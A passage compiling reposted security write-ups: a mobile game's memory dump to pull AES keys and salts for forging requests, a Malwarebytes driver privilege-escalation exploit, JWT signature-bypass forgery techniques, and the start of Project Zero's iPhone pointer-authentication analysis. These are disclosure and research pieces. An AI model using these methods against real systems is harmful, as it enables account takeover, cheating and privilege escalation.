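        "\r\n"
        f"{body}"
    ).encode()

# To actually send it against a live daemon (not done here), connect to the
# socket and write the bytes:
# import socket
# s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# s.connect("/var/run/docker.sock")
# s.sendall(build_create_request("nginx"))
# print(s.recv(4096).decode())
```

The response is the same {"Id": ...} JSON shown above; a second request to /containers/<Id>/start then mirrors the start step.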
-
Reverse engineering of a mobile game, part 2: they updated, we dumped memory
Guillaume Lesniak
Feb 2
In my previous story, I successfully reverse-engineered a mobile Tower Defense game on Android, which uses Unity. I have had a few chats back and forth with the company behind the game, which was aware of the original article. Since then, they've upgraded their API to change their methodology: they updated the hash salt and added encryption. Oh noes, we're doomed! Or, are we?
I'll start this article off where I left in the first part, so make sure to read it if you haven't already.
State of things
First things first, I fired up my mitmproxy again and checked if the API calls changed. They did update the endpoint, and now the data looks encrypted, both in the request and the response:
What used to be pure JSON is now unreadable bytes
However, we can notice that they haven't done anything about packet replay: performing the same actions in the game to produce another tournament query led to the same POST body and Hash being generated.
Next, as previously, we need to dump the new libil2cpp.so and global-metadata.dat files, run the tools on them, and then load the result into IDA. Since we already know where the hash was loaded (the Crypto class constructor) and where the packets were built (HttpClient), we can kickstart these parts a bit.
Digging into the code
After giving IDA some time to load the few thousand functions, let's have a look at the new and updated HttpPost method. Since I started off a clean disassembly project, I relabeled a few fields based on the Il2CppDumper DLL assembly output, reversed with .NET Reflector, to get cleaner pseudocode:
We can find again our friendly Crypto__ComputeHash, which computes the Hash value based on the unencrypted bytes; then the same bytes are fed into the Crypto.Encrypt method. So, they are indeed encrypting the body before sending it.
Inspecting that method reveals Rijndael-based (AES) encryption:
The cool thing about this is that they are using standard .NET crypto methods, which means that we'll have all the field descriptions and details directly in the .NET Framework documentation, as well as example code to replicate their encryption and decryption process right from MSDN.
Finally, the keys and salts moved from the Crypto class to a separate CryptoConstants class, but that won't change our work much.
Our lovely game developers even helped us with sizes in the C# fields:
We know the offsets at which the computed key and IV are stored, so no need to manually calculate them! Also, spoiler: I couldn't manage to calculate them properly from the base Salt and Password, for some reason, so directly using Key and IV was good enough.
So what we need to hack this new game revision is the AES key, and the new salt. With those, we should be able to encrypt and decrypt the messages and forge some to the server, as we could in the previous article.
In my previous article, I was stuck at retrieving the secret bytes from the app code directly, which made me brute-force it originally, but I mentioned an alternative method: debugging on device. This time, we have no other choice: we can't access byte arrays directly from static code (at least not that I know of), so our best and only way is to dump our device's (or emulator's) memory while the game is running, to get those bytes live. Let's do it.
Debugging a live process on device
Our goal here is to dump the memory of the game, for example at a time when it is hashing a server message, to dump the hash-salt bytes and the AES IV and key. To do that, we install IDA's debugging server on our device, run it, and use ADB to forward the port to our host machine through USB.
Once that’s done, we can attach our IDA debugger to any process on the device: We can attach to any process on our device But before actually attaching to a process, we need to set a few breakpoints in the pseudo-code. This will make the process pause, and IDA show the corresponding pseudo-code when the line is about to be executed by our phone’s CPU. First, as we want to dump the bytes that are appended to the JSON body before it is MD5-hashed, we just need to set a breakpoint where the final “salt” array is appended: Let’s break immediately after the salt bytes are loaded in ComputeHash Then, we want to break when encryption keys are used, so that we can dump the AES key and IV memory blocks: Note that if you want to break in a portion of code that is executed very early only once, you need to attach your debugger before those lines are executed. I haven’t found any trick to make IDA run the app from scratch with the debugger immediately attached, but luckily the Unity assembly takes some time to load, so we can tap the app icon, then immediately press Home to pause the game’s execution, giving us time to attach the IDA debugger, then resume the game. Here, we’re breaking at any call to the Decrypt method, so attaching afterwards is fine. A quick note on Dalvik and IDA: the debugger will catch a few signals sent by the Dalvik VM, caused by GC. Signals such as SIGPWR and SIGXCPU are then expected, so we need to set those as “ignore and pass to application” in the debugger setup, otherwise IDA will break the execution every time. Then, after attaching to the running game process, once we press a button that needs Decrypt and CalculateHash (any button that performs something online, like the Tournament button), the debugger will pause at the breakpoints we’ve set earlier: If I double-click the value I tagged “vSalt”, it will reveal the memory value. 
We skip the first 16 bytes (0x10), as those are Mono's headers and metadata for byte arrays, and then we can see the salt value before our eyes:
However, the AES IV and Key are put at a raw memory address that IDA didn't wrap as a variable, so we'll need some manual brain math from the pseudocode:
**(_DWORD **)(dwCryptoClass + 80)
*(_DWORD *)(*(_DWORD *)(dwCryptoClass + 80) + 4)
We know, from the previous article, that dwCryptoClass + 80 is a pointer to the value of the first field of the class, since the fields start at offset 80 (0x50). Our second field (the IV) is the next pointer (+ 4) at the value pointed to by dwCryptoClass + 80.
So here, to get the actual values for these two fields, we first need to take the dwCryptoClass pointer (0xCCA71300 in my case), then add 0x50. This gives us our first pointer address (pointers are 4 bytes, since this is an ARMv7 library with 32-bit memory addressing):
This ARM platform is also little-endian, so our address has to be read from bottom to top: 0xE6BD6D60.
Then, we have to jump there to get the actual pointers to each field's byte array:
Here, we have two pointers next to each other. If you get the operator priority right in the code extract above, our answers are hidden behind those two addresses: 0xE699F4D0 for the first field (Crypto._aesKey), and 0xCB2EBDE8 for the second field (Crypto._ivKey).
Again, at each of those addresses, we add 0x10 to get the actual array bytes:
Our pointer starts at 0xE699F4D0, and data starts 0x10 bytes later, at 0xE699F4E0.
We know that the IV is 16 bytes long and the key is 32 bytes long, as that's fairly standard, and also noted in the Rfc2898DeriveBytes .NET documentation (since we noted from the pseudocode that they used this class), so we just dump enough bytes from those two memory addresses. We can also infer that from the pseudocode.
From there, we could write a small encryption/decryption tool using glorious Golang, but for the sake of not wasting time fiddling with the algorithm settings, let's reuse C# and decrypt a message we dumped earlier in mitmproxy:
It works! On the left, the encrypted query. On the right, the decrypted JSON. Behind, our small C# decryption program running.
We can then use the same methodology to dump the ComputeHash key. Since we have a direct "vSaltBytes" variable that we were able to map in IDA, double-clicking reveals the value. Updating our previous hash calculation, and feeding it our decrypted query, leads us to the same hash as we had in the mitm'd request.
Here we go again!
We have successfully retrieved the AES key and IV that allow us to encrypt and decrypt the game's network messages, and dumped the brand new 16-byte (vs 6 bytes in the previous article) MD5 salt. With that information, we could build a new game cheat app and send forged requests to the server. More importantly, we've demonstrated how to successfully recover memory data from a running app on a live Android device, effectively letting you grab (or manipulate!) encryption keys.
Cheers!
Guillaume Lesniak
Sursa: https://medium.com/@xplodwild/reverse-engineering-of-a-mobile-game-part-2-they-updated-we-dumped-memory-27046efdfb85
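The dereference chain described above (class pointer, plus 0x50, pointer to the field slots, pointer to the array, plus 0x10 to skip the Mono array header) can be summarized in a few lines. This is my own sketch over a toy memory model, not the article's code; the offsets are the ones stated in the article:

```python
import struct

# Toy 32-bit little-endian "memory" (a dict of address -> byte) used to
# illustrate the dereference chain:
# dwCryptoClass + 0x50 -> fields block -> field pointer -> +0x10 -> raw bytes
def read_ptr(mem, addr):
    return struct.unpack("<I", bytes(mem[addr + i] for i in range(4)))[0]

def field_bytes(mem, crypto_class, field_index, length):
    fields = read_ptr(mem, crypto_class + 0x50)      # Crypto instance fields
    array = read_ptr(mem, fields + 4 * field_index)  # _aesKey index 0, _ivKey 1
    start = array + 0x10                             # skip Mono array header
    return bytes(mem[start + i] for i in range(length))

# Build a fake layout: class at 0, fields block at 0x100, key array at 0x200.
mem = {}
mem.update({0x50 + i: b for i, b in enumerate(struct.pack("<I", 0x100))})
mem.update({0x100 + i: b for i, b in enumerate(struct.pack("<I", 0x200))})
for i in range(32):
    mem[0x200 + 0x10 + i] = i  # pretend these are the 32 AES key bytes

print(field_bytes(mem, 0, 0, 32).hex())
```

On a live target the reads would of course go through the IDA debugger's memory view instead of a dict, but the arithmetic is the same.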
-
Exploiting Malwarebytes Anti-Exploit
Feb 02, 2019
On October 25th, I found a bug in the Anti-Exploit driver of Malwarebytes v3.6.1.2711 that caused a BSOD, and finally exploited it to achieve an EoP from a standard user to SYSTEM. In short, it's a combination of incomplete input validation and an insecure manner of accessing a file. In this blog post, I'll walk through the process of how I exploited the bug. Systems affected include Windows 7 SP1 x86/64 and Windows 10 x86/64. In this post I'm assuming Windows 7/10 x86, as I wrote a complete exploit only for those systems. However, I think you can easily port it to x64 systems if needed. I'd like to express special thanks to my friend Francesco Mifsud (@GradiusX) for letting me borrow some code from his GitHub repository. The final PoC is here.
High Overview
The first thing I did was to identify the kernel-mode drivers used by Malwarebytes and the attack surfaces they expose. Using DriverView and WinObj, I found out the Anti-Exploit driver (mbae.sys) was accessible by a normal user through the device name “\\.\ESProtectionDriver”.
As can be seen from the picture above, there are quite a few drivers from Malwarebytes with fancy names, but I didn't look into the other drivers, as I lost interest a bit after having exploited the first target.
Reversing
The interesting part of the code in mbae.sys is the dispatch routine for the IRP major function code IRP_MJ_DEVICE_CONTROL. Identifying the routine is straightforward, because it's directly referenced from the DriverEntry. The following is the graph overview of the function sub_40338C that processes DeviceIoControl codes.
The blue boxes are where DeviceIoControl codes are compared with some constants. Each of the yellow boxes calls the handler for a DeviceIoControl code. The red boxes validate the input buffer (SystemBuffer). From the blue boxes, 5 different DeviceIoControl codes can be identified: 0x22E000, 0x22E004, 0x22E008, 0x22E00C, 0x22E010.
These codes mean the driver uses Buffered IO, though that's not very relevant here. The input buffer needs a DWORD size field, a 0x14-byte hash field, and an obfuscated data field, like below:
The obfuscated data is deobfuscated in the validation process (the bottom red box).
Then I looked at the handlers for the DeviceIoControl codes. Some of the handlers have try/except blocks, and in each of the except blocks a crash file is created under C:\, meaning that if I could make the exception handler be called in a controlled manner (no BSOD), I could create an arbitrary file at an arbitrary location by redirecting the file write.
Initial Attack
My initial attack was simply capturing and replaying legit DeviceIoControl requests made by the userland code of Malwarebytes. WinDBG and IDA revealed the uses of some of the DeviceIoControl codes: 0x22E000 is used for an InjectionRequest (whatever that means) and called when the Anti-Exploit protection is turned on. 0x22E004 and 0x22E008 are for an UninjectionRequest and an AllowUnloadRequest respectively, which are called when a user turns the Anti-Exploit protection off.
Luckily enough, I successfully got a BSOD by replaying an UninjectionRequest a few times. No fuzzing was needed.
Analyzing Bug
Next I stepped into the root cause of the bug. After some experiments, I learned that an exception could be caused by one of the two calls to _wcslwr, as shown below. Here edi points to the first byte of the SystemBuffer.
_wcslwr can fail. For example, if the argument of _wcslwr points to an unmapped or read-only page, or to a sequence of bytes that's not terminated by a double null '\x00\x00', an exception happens. If the location where the exception happened was in the Kernel Space, it leads to a BSOD.
Avoiding BSOD
The strategy is to always make the exception happen in the User Space.
On the first call to _wcslwr, eax points to offset 0x298 of the SystemBuffer. So if an exception happens here by accessing past the end of the SystemBuffer, it definitely leads to a BSOD. This can be avoided by putting a double null ‘\x00\x00’ at offset 0x298. The next call to _wcslwr is more interesting (I mean, controllable). The DWORD at offset 0x290 of the SystemBuffer is doubled and added to edi (the address of the SystemBuffer). In my exploit, I put 0x40000000 at offset 0x290 so that the argument of _wcslwr points into user space. The DWORD at offset 0x290 may be any value other than 0x00000000. The layout of the payload (before being obfuscated) is shown below. Sometimes no exception occurs, but that does no harm.

Obfuscation

I analyzed the deobfuscation scheme so that I could send an obfuscated payload. Simply put, it’s just a triple XOR. The first step of deobfuscation is as simple as XORing the data part with the hash part, extended to the length of the data by repetition. A hash of the data is computed at this point and compared with the hash in the SystemBuffer. If they match, each byte of the data is XORed with the first byte (LSB) of the thread ID and with the offset (mod 0x100) of the byte in the data. The steps of obfuscation are the same because XOR is commutative. The fact that the thread ID is involved makes the hash and data parts less predictable, but we can actually make the entire payload static by using a thread whose thread ID has a constant LSB, like always 0. Then the correct hash can be obtained from memory using a debugger. Reversing the (SHA-1-like) hashing algorithm wasn’t necessary.

Exploitation

The idea of the exploitation is to redirect the location of the crash file using a symbolic link to another location, like \GLOBAL??\C:\Windows\system32\msfte.dll, and then overwrite it with a fake DLL. The DLL is supposed to be loaded by a process with SYSTEM privilege.
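For reference, the triple-XOR scheme from the Obfuscation section above can be sketched in Python. This is a minimal model of the description, not code lifted from the driver or the PoC; the function name and the example hash and filler values are mine:

```python
def xor_layers(data: bytes, hash_part: bytes, tid_lsb: int) -> bytes:
    """Apply the three XOR layers: the 0x14-byte hash repeated over the
    data, the LSB of the thread ID, and each byte's offset mod 0x100.
    XOR is its own inverse, so the same function both obfuscates and
    deobfuscates (the driver just also checks the hash in between)."""
    out = bytearray()
    for i, b in enumerate(data):
        out.append(b ^ hash_part[i % len(hash_part)] ^ (tid_lsb & 0xFF) ^ (i & 0xFF))
    return bytes(out)

# Payload layout from above: a nonzero DWORD (0x40000000, little-endian)
# at offset 0x290 and a double null at offset 0x298; 'CCCC' is filler.
payload = b"\x00" * 0x290 + b"\x00\x00\x00\x40" + b"CCCC" + b"\x00\x00"
obfuscated = xor_layers(payload, b"\xAA" * 0x14, 0)
```

Running the payload through the function twice with the same hash and thread-ID byte yields the original bytes back, which is why one routine covers both directions.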
This technique is based on the fact that the device map can be changed per process, much like chroot on *nix systems. The shortcoming of this method is that we cannot predictably trigger the load of msfte.dll. We could quickly find a better place to put a payload DLL and hijack DLL loads by running Process Monitor as SYSTEM. Below is a successful run of the PoC.

Timeline

2018.10.25: Vulnerability detected.
2018.10.30: PoC shared with Malwarebytes.
2019.02.02: Full disclosure.

References

[1] https://github.com/GradiusX/HEVD-Python-Solutions/blob/master/Win7 x86/HEVD_InsecureKernelResourceAccess.py
[2] http://blog.airesoft.co.uk/2012/01/chroot-ing-in-windows-as-easy-as-a-b-c/

Source: https://acru3l.github.io/2019/02/02/exploiting-mb-anti-exploit/
-
Critical vulnerabilities in JSON Web Token libraries Which libraries are vulnerable to attacks and how to prevent them. Tim McLean March 31, 2015 tl;dr If you are using node-jsonwebtoken, pyjwt, namshi/jose, php-jwt or jsjwt with asymmetric keys (RS256, RS384, RS512, ES256, ES384, ES512) please update to the latest version. See jwt.io for more information on the vulnerable libraries. (Updated 2015-04-20) This is a guest post from Tim McLean, who is a member of the Auth0 Security Researcher Hall of Fame. Tim normally blogs at www.timmclean.net. Recently, while reviewing the security of various JSON Web Token implementations, I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step. The same two flaws were found across many implementations and languages, so I thought it would be helpful to write up exactly where the problems occur. I believe that a change to the standard could help prevent future vulnerabilities. For those who are unfamiliar, JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. For example, a server could generate a token that has the claim "logged in as admin" and provide that to a client. The client could then use that token to prove that they are logged in as admin. The tokens are signed by the server's key, so the server is able to verify that the token is legitimate. JWTs generally have three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature, and looks something like this: header = '{"alg":"HS256","typ":"JWT"}' HS256 indicates that this token is signed using HMAC-SHA256. The payload contains the claims that we wish to make: payload = '{"loggedInAs":"admin","iat":1422779638}' As suggested in the JWT spec, we include a timestamp called iat, short for "issued at".
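Concretely, these two JSON strings can be base64url-encoded with nothing but the standard library. A minimal sketch (the b64url helper name is mine; the signing step is described next in the post):

```python
import base64
import json

def b64url(raw: bytes) -> bytes:
    # JWT uses base64url without '=' padding
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

# Compact JSON (no spaces), matching the strings shown above
header = json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":"))
payload = json.dumps({"loggedInAs": "admin", "iat": 1422779638}, separators=(",", ":"))

encoded_header = b64url(header.encode())
encoded_payload = b64url(payload.encode())
```

These two encoded segments become the first two dot-separated parts of the token.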
The signature is calculated by base64url encoding the header and payload and concatenating them with a period as a separator:

key = 'secretkey'
unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)
signature = HMAC-SHA256(key, unsignedToken)

To put it all together, we base64url encode the signature, and join together the three parts using periods:

token = encodeBase64(header) + '.' + encodeBase64(payload) + '.' + encodeBase64(signature)
# token is now: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9.gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI

Great. So, what's wrong with that? Well, let's try to verify a token. First, we need to determine what algorithm was used to generate the signature. No problem, there's an alg field in the header that tells us just that. But wait, we haven't validated this token yet, which means that we haven't validated the header. This puts us in an awkward position: in order to validate the token, we have to allow attackers to select which method we use to verify the signature. This has disastrous implications for some implementations.

Meet the "none" algorithm

The none algorithm is a curious addition to JWT. It is intended to be used for situations where the integrity of the token has already been verified. Interestingly enough, it is one of only two algorithms that are mandatory to implement (the other being HS256). Unfortunately, some libraries treated tokens signed with the none algorithm as valid tokens with a verified signature. The result? Anyone can create their own "signed" tokens with whatever payload they want, allowing arbitrary account access on some systems. Putting together such a token is easy. Modify the above example header to contain "alg": "none" instead of HS256. Make any desired changes to the payload. Use an empty signature (i.e. signature = ""). Most (hopefully all?)
implementations now have a basic check to prevent this attack: if a secret key was provided, then token verification will fail for tokens using the none algorithm. This is a good idea, but it doesn't solve the underlying problem: attackers control the choice of algorithm. Let's keep digging.

RSA or HMAC?

The JWT spec also defines a number of asymmetric signing algorithms (based on RSA and ECDSA). With these algorithms, tokens are created and signed using a private key, but verified using a corresponding public key. This is pretty neat: if you publish the public key but keep the private key to yourself, only you can sign tokens, but anyone can check if a given token is correctly signed. Most of the JWT libraries that I've looked at have an API like this:

# sometimes called "decode"
verify(string token, string verificationKey)
# returns payload if valid token, else throws an error

In systems using HMAC signatures, verificationKey will be the server's secret signing key (since HMAC uses the same key for signing and verifying):

verify(clientToken, serverHMACSecretKey)

In systems using an asymmetric algorithm, verificationKey will be the public key against which the token should be verified:

verify(clientToken, serverRSAPublicKey)

Unfortunately, an attacker can abuse this. If a server is expecting a token signed with RSA, but actually receives a token signed with HMAC, it will think the public key is actually an HMAC secret key. How is this a disaster? HMAC secret keys are supposed to be kept private, while public keys are, well, public. This means that your typical ski mask-wearing attacker has access to the public key, and can use this to forge a token that the server will accept. Doing so is pretty straightforward. First, grab your favourite JWT library, and choose a payload for your token. Then, get the public key used on the server as a verification key (most likely in the text-based PEM format).
Finally, sign your token using the PEM-formatted public key as an HMAC key. Essentially:

forgedToken = sign(tokenPayload, 'HS256', serverRSAPublicKey)

The trickiest part is making sure that serverRSAPublicKey is identical to the verification key used on the server. The strings must match exactly for the attack to work -- exact same format, and no extra or missing line breaks. End result? Anyone with knowledge of the public key can forge tokens that will pass verification.

Recommendations for Library Developers

I suggest that JWT libraries add an algorithm parameter to their verification function:

verify(string token, string algorithm, string verificationKey)

The server should already know what algorithm it uses to sign tokens, and it's not safe to allow attackers to provide this value. Some might argue that some servers need to support more than one algorithm for compatibility reasons. In this case, a separate key can (and should) be used for each supported algorithm. JWT conveniently provides a "key ID" field (kid) for exactly this purpose. Since servers can use the key ID to look up the key and its corresponding algorithm, attackers are no longer able to control the manner in which a key is used for verification. In any case, I don't think JWT libraries should even look at the alg field in the header, except maybe to check that it matches the expected algorithm. Anyone using a JWT implementation should make sure that tokens with a different signature type are guaranteed to be rejected. Some libraries have an optional mechanism for whitelisting or blacklisting algorithms; take advantage of it or you might end up at risk. Even better: have a policy of performing security audits on any open source libraries that you use to provide mission-critical functionality.

Improving the JWT/JWS standard

I would like to propose deprecating the header's alg field. As we've seen here, its misuse can have a devastating impact on the security of a JWT/JWS implementation.
As far as I can tell, key IDs provide an adequate alternative. This warrants a change to the spec: JWT libraries continue to be written with security flaws due to their dependence on alg. JWT (and JOSE) present the opportunity to have a cross-platform suite of secure cryptography implementations. With these fixes, hopefully we're a little bit closer to making that a reality.

Source: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
-
Friday, February 1, 2019 Examining Pointer Authentication on the iPhone XS Posted by Brandon Azad, Project Zero

In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing.

ARMv8.3-A Pointer Authentication

Among the most exciting security features introduced with ARMv8.3-A is Pointer Authentication, a feature where the upper bits of a pointer are used to store a Pointer Authentication Code (PAC), which is essentially a cryptographic signature on the pointer value and some additional context. Special instructions have been introduced to add an authentication code to a pointer and to verify an authenticated pointer's PAC and restore the original pointer value. This gives the system a way to make cryptographically strong guarantees about the likelihood that certain pointers have been tampered with by attackers, which offers the possibility of greatly improving application security. (Proper terminology dictates that the security feature is called Pointer Authentication while the cryptographic signature that is inserted into the unused bits of a pointer is called the Pointer Authentication Code, or PAC. However, popular usage has already confused these terms, and it is common to see Pointer Authentication referred to as PAC. Usually this usage is unambiguous, so for brevity I will often refer to Pointer Authentication as PAC as well.) There are many great articles describing Pointer Authentication, so I'll only go over the rough details here.
Interested readers can refer to Qualcomm's whitepaper, Mark Rutland's slides from the 2017 Linux Security Summit, this LWN article by Jonathan Corbet, and the ARM A64 Instruction Set Architecture for further details. The key insight that makes Pointer Authentication viable is that, although pointers are 64 bits, most systems have a virtual address space that is much smaller, which leaves unused bits in a pointer that can be used to store additional data. In the case of Pointer Authentication, these bits will be used to store a short authentication code over both the original 64-bit pointer value and a 64-bit context value. Systems are allowed to use an implementation-defined algorithm to compute PACs, but the standard recommends the use of a block cipher called QARMA. According to the whitepaper, QARMA is "a new family of lightweight tweakable block ciphers" designed specifically for pointer authentication. QARMA-64, the variant used in the standard, takes as input a secret 128-bit key, a 64-bit plaintext value (the pointer), and a 64-bit tweak (the context), and produces as output a 64-bit ciphertext. The truncated ciphertext becomes the PAC that gets inserted into the unused extension bits of the pointer. The architecture provides for 5 secret 128-bit Pointer Authentication keys. Two of these keys, APIAKey and APIBKey, are used for instruction pointers. Another two, APDAKey and APDBKey, are used for data pointers. And the last key, APGAKey, is a special "general" key that is used for signing larger blocks of data with the PACGA instruction. Providing multiple keys allows for some basic protection against pointer substitution attacks, in which one authenticated pointer is substituted with another. The values of these keys are set by writing to special system registers. The registers containing the Pointer Authentication keys are inaccessible from EL0, meaning that a userspace process cannot read or change them. 
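To make the scheme concrete, here is a toy model of signing and authenticating a pointer. This is emphatically not QARMA or Apple's algorithm — any keyed MAC illustrates the idea — and the 39-bit address width, little-endian packing, and absence of a tag bit are simplifying assumptions of mine:

```python
import hashlib

VA_BITS = 39  # assumed virtual-address width; real configurations vary
PAC_MASK = ((1 << 64) - 1) & ~((1 << VA_BITS) - 1)  # unused upper bits

def toy_pac(ptr: int, context: int, key: bytes) -> int:
    """Insert a truncated MAC over (pointer, context) into the pointer's
    unused upper bits, in the spirit of PACIA/PACDA."""
    msg = ptr.to_bytes(8, "little") + context.to_bytes(8, "little")
    mac = int.from_bytes(hashlib.blake2b(msg, key=key, digest_size=8).digest(), "little")
    return (ptr & ~PAC_MASK) | (mac & PAC_MASK)

def toy_aut(signed: int, context: int, key: bytes) -> int:
    """Verify the code and strip it, in the spirit of AUTIA/AUTDA; a real
    CPU would poison the pointer's extension bits instead of raising."""
    ptr = signed & ~PAC_MASK
    if toy_pac(ptr, context, key) != signed:
        raise ValueError("PAC check failed")
    return ptr
```

Substituting a different context or key makes authentication fail, which is the property the split into A/B and instruction/data keys relies on.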
However, the hardware provides no other key management features: it's up to the code running at each exception level to manage the keys for the next lower exception level. ARMv8.3-A introduces three new categories of instructions for dealing with PACs:

PAC* instructions generate and insert the PAC into the extension bits of a pointer. For example, PACIA X8, X9 will compute the PAC for the pointer in register X8 under the A-instruction key, APIAKey, using the value in X9 as context, and then write the resulting PAC'd pointer back in X8. Similarly, PACIZA is like PACIA except the context value is fixed to 0.

AUT* instructions verify a pointer's PAC (along with the 64-bit context value). If the PAC is valid, then the PAC is replaced with the original extension bits. Otherwise, if the PAC is invalid (indicating that this pointer was tampered with), then an error code is placed in the pointer's extension bits so that a fault is triggered if the pointer is dereferenced. For example, AUTIA X8, X9 will verify the PAC'd pointer in X8 under the A-instruction key using X9 as context, writing the valid pointer back to X8 if successful and writing an invalid value otherwise.

XPAC* instructions remove a pointer's PAC and restore the original value without performing verification.

In addition to these general Pointer Authentication instructions, a number of specialized variants were introduced to combine Pointer Authentication with existing operations:

BLRA* instructions perform a combined authenticate-and-branch operation: the pointer is validated and then used as the branch target for BLR. For example, BLRAA X8, X9 will authenticate the PAC'd pointer in X8 under the A-instruction key using X9 as context and then branch to the resulting address.

LDRA* instructions perform a combined authenticate-and-load operation: the pointer is validated and then data is loaded from that address.
For example, LDRAA X8, X9 will validate the PAC'd pointer X9 under the A-data key using a context value of 0 and then load the 64-bit value at the resulting address into X8.

RETA* instructions perform a combined authenticate-and-return operation: the link register LR is validated and then RET is performed. For example, RETAB will verify LR using the B-instruction key and then return.

A known limitation: signing gadgets

Before we start our analysis of PAC, I should mention a known limitation: PAC can be bypassed if an attacker with read/write access can coerce the system into executing a signing gadget. Signing gadgets are instruction sequences that can be used to sign arbitrary pointers. For example, if an attacker can trigger the execution of a function that reads a pointer from memory, adds a PAC, and writes it back, then they can use this function as a signing oracle to forge PACs for arbitrary pointers.

Weaknesses against kernel attackers

As discussed in the Qualcomm whitepaper, ARMv8.3 Pointer Authentication was designed to provide some protection even against attackers with arbitrary memory read or arbitrary memory write capabilities. But it's important to understand the limitations of the design under the attack model we're considering: a kernel attacker who already has read/write and is looking to execute arbitrary code by forging PACs on kernel pointers. Looking at the specification, I identified three potential weaknesses in the design when protecting against kernel attackers with read/write: reading the PAC keys from memory, signing kernel pointers in userspace, and signing A-key pointers using the B-key (or vice versa). We'll discuss each in turn.

Reading PAC keys from kernel memory

First let's consider what is perhaps the most obvious type of attack: just reading the PAC keys from kernel memory and then manually computing PACs for arbitrary kernel pointers.
Here's an excerpt from the subsection of the whitepaper on attackers who can read arbitrary memory:

Pointer Authentication is designed to resist memory disclosure attacks. The PAC is computed using a cryptographically strong algorithm, so reading any number of authenticated pointers from memory would not make it easier to forge pointers. The keys are stored in processor registers, and these registers are not accessible from usermode (EL0). Therefore, a memory disclosure vulnerability would not help extract the keys used for PAC generation.

While true, this description applies specifically to attacking a userspace program, not attacking the kernel itself. Recent iOS devices do not appear to be running a hypervisor (EL2) or secure monitor (EL3), meaning the kernel running at EL1 must manage its own PAC keys. And since the system registers that store them during normal operation will be cleared when the core goes to sleep, this means that the PAC keys must at some point be stored in kernel memory. Thus an attacker with kernel memory access could probably read the keys and use them to manually compute authentication codes for arbitrary pointers. Of course, this approach assumes that we know what algorithm is being used under the hood to generate PACs so that we can implement it ourselves in userspace. Knowing Apple, there's a good chance they're using a custom algorithm in place of QARMA. If that's the case, then knowing the PAC keys wouldn't be sufficient to forge PACs: either we'd have to reverse engineer the silicon and determine the algorithm, or we'd have to find a way to reuse the existing machinery to forge pointers on our behalf.

Cross-EL PAC forgeries

Along the latter line of analysis, one possible way to do that would be to forge PACs for kernel pointers by executing the corresponding PAC* instructions in userspace. While this may sound naive, there are a few reasons this could work.
While unlikely, it's possible that Apple has decided to use the same PAC keys for EL0 and EL1, in which case we could forge a kernel PACIA signature (for example) by literally executing a PACIA instruction on the kernel pointer from userspace. You can see that the ARM pseudocode describing the implementation of PAC* instructions makes no distinction between whether this instruction was executed at EL0 or EL1. Here's the pseudocode for AddPACIA(), which describes the implementation of PACIA-like instructions:

// AddPACIA()
// ==========
// Returns a 64-bit value containing X, but replacing the pointer
// authentication code field bits with a pointer authentication code, where the
// pointer authentication code is derived using a cryptographic algorithm as a
// combination of X, Y, and the APIAKey_EL1.
bits(64) AddPACIA(bits(64) X, bits(64) Y)
    boolean TrapEL2;
    boolean TrapEL3;
    bits(1) Enable;
    bits(128) APIAKey_EL1;
    APIAKey_EL1 = APIAKeyHi_EL1<63:0>:APIAKeyLo_EL1<63:0>;
    case PSTATE.EL of
        when EL0
            boolean IsEL1Regime = S1TranslationRegime() == EL1;
            Enable = if IsEL1Regime then SCTLR_EL1.EnIA else SCTLR_EL2.EnIA;
            TrapEL2 = (EL2Enabled() && HCR_EL2.API == '0' &&
                       (HCR_EL2.TGE == '0' || HCR_EL2.E2H == '0'));
            TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0';
        when EL1
            Enable = SCTLR_EL1.EnIA;
            TrapEL2 = EL2Enabled() && HCR_EL2.API == '0';
            TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0';
    ...
    if Enable == '0' then
        return X;
    elsif TrapEL2 then
        TrapPACUse(EL2);
    elsif TrapEL3 then
        TrapPACUse(EL3);
    else
        return AddPAC(X, Y, APIAKey_EL1, FALSE);

And here's the pseudocode implementation of AddPAC():
// AddPAC()
// ========
// Calculates the pointer authentication code for a 64-bit quantity and then
// inserts that into pointer authentication code field of that 64-bit quantity.
bits(64) AddPAC(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data)
    bits(64) PAC;
    bits(64) result;
    bits(64) ext_ptr;
    bits(64) extfield;
    bit selbit;
    boolean tbi = CalculateTBI(ptr, data);
    integer top_bit = if tbi then 55 else 63;
    // If tagged pointers are in use for a regime with two TTBRs, use bit<55> of
    // the pointer to select between upper and lower ranges, and preserve this.
    // This handles the awkward case where there is apparently no correct
    // choice between the upper and lower address range - ie an addr of
    // 1xxxxxxx0... with TBI0=0 and TBI1=1 and 0xxxxxxx1 with TBI1=0 and
    // TBI0=1:
    if PtrHasUpperAndLowerAddRanges() then
        ...
    else
        selbit = if tbi then ptr<55> else ptr<63>;
    integer bottom_PAC_bit = CalculateBottomPACBit(selbit);
    // The pointer authentication code field takes all the available bits in
    // between
    extfield = Replicate(selbit, 64);
    // Compute the pointer authentication code for a ptr with good extension bits
    if tbi then
        ext_ptr = ptr<63:56>:extfield<(56-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
    else
        ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
    PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>);
    // Check if the ptr has good extension bits and corrupt the pointer
    // authentication code if not;
